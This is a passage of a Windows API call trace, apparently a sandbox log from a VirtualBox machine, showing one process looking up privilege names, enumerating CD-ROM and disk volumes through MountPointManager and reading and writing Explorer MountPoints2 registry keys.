| 19:40:26,433 | 252 | LookupPrivilegeValueW |
SystemName => PrivilegeName => SeLoadDriverPrivilege |
SUCCESS | 0x00000001 | |
| 19:40:26,433 | 252 | LookupPrivilegeValueW |
SystemName => PrivilegeName => SeUndockPrivilege |
SUCCESS | 0x00000001 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CM_Get_Device_Interface_List_ExW FunctionAddress => 0x7792a15c ModuleHandle => 0x77920000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 3 FileName => IDE#CdRomVBOX_CD-ROM_____________________________1.0_____#42562d3231303037333036372020202020202020#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} DesiredAccess => 0x00100080 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x1c\x00\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00C\x00d\x00R\x00o\x00m\x000\x00 IoControlCode => 5046280 InBuffer => |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0xffffffff FileInformation => \x00\x00\x00\x00\xa0\xda\x13\x00x \x82|<\xfc\x81|\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x80\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\xf8\xda\x13\x00\x00\xdd\x13\x00\x00\xdd\x13\x00`\xd9\x13\x00\x18\x00\x00\x00\x00\x00\x00\x00\x84\xd8\x13\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xd7\x1a\x00\xd0\xdc\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00 |
FAILURE | 0xc0000024 | |
| 19:40:26,443 | 252 | NtCreateFile |
ShareAccess => 3 FileName => MountPointManager DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \xea\x01\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x1c\x00\x00\x00\\x00D\x00e\x00v\x00 IoControlCode => 7143432 InBuffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x1c\x00\x00\x00\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00C\x00d\x00R\x00o\x00m\x000\x00 |
FAILURE | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \xea\x01\x00\x00\x02\x00\x00\x00n\x01\x00\x00`\x00\x00\x008\x00\x00\x00\x1a\x01\x00\x00R\x01\x00\x00\x1c\x00v\x00\xce\x01\x00\x00\x1c\x00\\x008\x00\x00\x00\x1a\x01o\x00R\x01\x00\x00\x1c\x00\x00\x00\\x00?\x00?\x00\\x00I\x00D\x00E\x00#\x00C\x00d\x00R\x00o\x00m\x00V\x00B\x00O\x00X\x00_\x00C\x00D\x00-\x00R\x00O\x00M\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x00_\x001\x00.\x000\x00_\x00_\x00_\x00_\x00_\x00#\x004\x002\x005\x006\x002\x00d\x003\x002\x003\x001\x003\x000\x003\x000\x003\x007\x003\x003\x003\x000\x003\x006\x003\x007\x002\x000\x002\x000\x002\x000\x002\x000\x002\x000\x002\x000\x002\x000\x00 IoControlCode => 7143432 InBuffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x1c\x00\x00\x00\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00C\x00d\x00R\x00o\x00m\x000\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x000001fc SubKey => {b602d500-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000200 Data => ValueName => Data |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000200 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x00000200 SubKey => {b602d500-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000200 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fc Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 334 FunctionName => FunctionAddress => 0x773e0f5a ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 3 FileName => STORAGE#Volume#1&30a96598&0&Signature1010101Offset7E00Length2701AF400#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} DesiredAccess => 0x00100080 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => .\x00\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00H\x00a\x00r\x00d\x00d\x00i\x00s\x00k\x00V\x00o\x00l\x00u\x00m\x00e\x001\x00 IoControlCode => 5046280 InBuffer => |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0xffffffff FileInformation => \x00\x00\x00\x00\xa0\xda\x13\x00x \x82|<\xfc\x81|\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x80\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\xf8\xda\x13\x00\x00\xdd\x13\x00\x00\xdd\x13\x00S\x00o\x00\x18\x00\x00\x00\x00\x00\x00\x00\x84\xd8\x13\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\xeb\x1a\x00@\xeb\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00 |
FAILURE | 0xc0000024 | |
| 19:40:26,443 | 252 | NtCreateFile |
ShareAccess => 3 FileName => MountPointManager DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \xee\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00.\x00\x00\x00\\x00D\x00e\x00v\x00 IoControlCode => 7143432 InBuffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00.\x00\x00\x00\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00H\x00a\x00r\x00d\x00d\x00i\x00s\x00k\x00V\x00o\x00l\x00u\x00m\x00e\x001\x00 |
FAILURE | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \xee\x00\x00\x00\x02\x00\x00\x00r\x00\x00\x00`\x00\x00\x008\x00\x00\x00\x0c\x00\x00\x00D\x00\x00\x00.\x00v\x00\xd2\x00\x00\x00\x1c\x00\\x008\x00\x00\x00\x0c\x00d\x00D\x00\x00\x00.\x00k\x00\x01\x01\x01\x01\x00~\x00\x00\x00\x00\x00\x00\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00H\x00a\x00r\x00d\x00d\x00i\x00s\x00k\x00V\x00o\x00l\x00u\x00m\x00e\x001\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x002\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\\x00D\x00o\x00s\x00D\x00e\x00v\x00i\x00c\x00e\x00s\x00\\x00C\x00:\x00 IoControlCode => 7143432 InBuffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00.\x00\x00\x00\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\x00H\x00a\x00r\x00d\x00d\x00i\x00s\x00k\x00V\x00o\x00l\x00u\x00m\x00e\x001\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x000001fc SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000200 Data => ValueName => Data |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000200 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x00000200 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000200 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fc Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 332 FunctionName => FunctionAddress => 0x773e0df4 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0xffffffff FileInformation => |
FAILURE | 0xc0000024 | |
| 19:40:26,443 | 252 | NtCreateFile |
ShareAccess => 3 FileName => MountPointManager DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x002\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
FAILURE | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00C\x00:\x00\x00\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x002\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0xffffffff FileInformation => \xbb\x01\x91|\xa0\xdd\x13\x00\x7f\x0e\x82|<\xfc\x81|\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x80\x00\x00\x00\xff\xff\xff\xff\xb8\xeb\x1a\x00\xfc\x0c\x82|\xd8\xee\x1a\x00b\x00d\x00 \xec\x1a\x00\xc8\xf2\x13\x00\xc0\x9a\x83|\xdc\xdd\x13\x00\x18\x0e\xa0| \xec\x1a\x00\xd8\xee\x1a\x00\x05\x00\x00\x00\xd4\xdd\x13\x00\x00\x00\x00\x00.\x93\x80|\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00h\x15>w\x05\x00\x00\x00A\xe0\x00\x00\xf4\xdd\x13\x00\x8e\x0c\xa0|\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x14\xde\x13\x00Y\x0b\xa0|\x00\x00\x00\x00\xa8\xf5\xbc|\x05@\x00\x80\\x00\x00\x00A\xe0\x00\x00A\xe0\x00\x00<\xde\x13\x00%\x0c\xa0|\x00\x00\x00\x00\xa8\xf5\xbc|\x00\x00\x00\x00\xc8\xf2\x13\x00\xdcF_w\xc8\xd4Ow\xff\xff\xff\xffA\xe0\x00\x00X\xde\x13\x00\xba\xa0\x9e|\x02\x00\x00\x00\x00\x00\x00\x00\xf0\xb0\x17\x00\x03\x00\x07\x80\xc0\xde\x13\x00\x8c\xde\x13\x00 |
FAILURE | 0xc0000024 | |
| 19:40:26,443 | 252 | NtCreateFile |
ShareAccess => 3 FileName => MountPointManager DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x002\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
FAILURE | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00C\x00:\x00\x00\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x002\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x000001fc Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegSetValueExW |
Handle => 0x000001fc Buffer => D\x00r\x00i\x00v\x00e\x00\x00\x00 ValueName => BaseClass Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0xffffffff FileInformation => @\x00\x91|\xa0\xdd\x13\x00\x7f\x0e\x82|<\xfc\x81|\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x80\x00\x00\x00\xff\xff\xff\xff\xd0\xa9\x17\x00\xfc\x0c\x82|\xd8\xee\x1a\x00b\x00d\x00\x00\xe3\x18\x00\xd8\xee\x1a\x00\xc8\xf2\x13\x00\xdc\xdd\x13\x00\xde \xa0|\x00\xe3\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd4\xdd\x13\x00\x00\x00\x00\x00.\x93\x80|\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\x15>w\x05\x00\x00\x00A\xe0\x00\x00\xf4\xdd\x13\x00\x8e\x0c\xa0|\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x14\xde\x13\x00Y\x0b\xa0|\x00\x00\x00\x00\xa8\xf5\xbc|\x05@\x00\x80\\x00\x00\x00A\xe0\x00\x00A\xe0\x00\x00<\xde\x13\x00%\x0c\xa0|\x00\x00\x00\x00\xa8\xf5\xbc|\x00\x00\x00\x00\xc8\xf2\x13\x00\xdcF_w\xc8\xd4Ow\xff\xff\xff\xffA\xe0\x00\x00X\xde\x13\x00\xba\xa0\x9e|\x02\x00\x00\x00\x00\x00\x00\x00\xf0\xb0\x17\x00\x03\x00\x07\x80\xc0\xde\x13\x00\x8c\xde\x13\x00 |
FAILURE | 0xc0000024 | |
| 19:40:26,443 | 252 | NtCreateFile |
ShareAccess => 3 FileName => MountPointManager DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x000\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
FAILURE | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00D\x00:\x00\x00\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x000\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0xffffffff FileInformation => \xbb\x01\x91|\xa0\xdd\x13\x00\x7f\x0e\x82|<\xfc\x81|\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x80\x00\x00\x00\xff\xff\xff\xff\xd0\xa9\x17\x00\xfc\x0c\x82|\xd8\xee\x1a\x00b\x00d\x00\x00\xe3\x18\x00\xc8\xf2\x13\x00\xc0\x9a\x83|\xdc\xdd\x13\x00\x18\x0e\xa0|\x00\xe3\x18\x00\xd8\xee\x1a\x00\x05\x00\x00\x00\xd4\xdd\x13\x00\x00\x00\x00\x00.\x93\x80|\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\x15>w\x05\x00\x00\x00A\xe0\x00\x00\xf4\xdd\x13\x00\x8e\x0c\xa0|\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x14\xde\x13\x00Y\x0b\xa0|\x00\x00\x00\x00\xa8\xf5\xbc|\x05@\x00\x80\\x00\x00\x00A\xe0\x00\x00A\xe0\x00\x00<\xde\x13\x00%\x0c\xa0|\x00\x00\x00\x00\xa8\xf5\xbc|\x00\x00\x00\x00\xc8\xf2\x13\x00\xdcF_w\xc8\xd4Ow\xff\xff\xff\xffA\xe0\x00\x00X\xde\x13\x00\xba\xa0\x9e|\x02\x00\x00\x00\x00\x00\x00\x00\xf0\xb0\x17\x00\x03\x00\x07\x80\xc0\xde\x13\x00\x8c\xde\x13\x00 |
FAILURE | 0xc0000024 | |
| 19:40:26,443 | 252 | NtCreateFile |
ShareAccess => 3 FileName => MountPointManager DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x000\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
FAILURE | 0x00000000 | |
| 19:40:26,443 | 252 | DeviceIoControl |
DeviceHandle => 0x000001fc OutBuffer => \x08\x00\x00\x00D\x00:\x00\x00\x00\x00\x00 IoControlCode => 7143476 InBuffer => `\x00\\x00?\x00?\x00\\x00V\x00o\x00l\x00u\x00m\x00e\x00{\x00b\x006\x000\x002\x00d\x005\x000\x000\x00-\x005\x008\x001\x008\x00-\x001\x001\x00e\x005\x00-\x009\x00f\x001\x007\x00-\x008\x000\x006\x00d\x006\x001\x007\x002\x006\x009\x006\x00f\x00}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000001 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
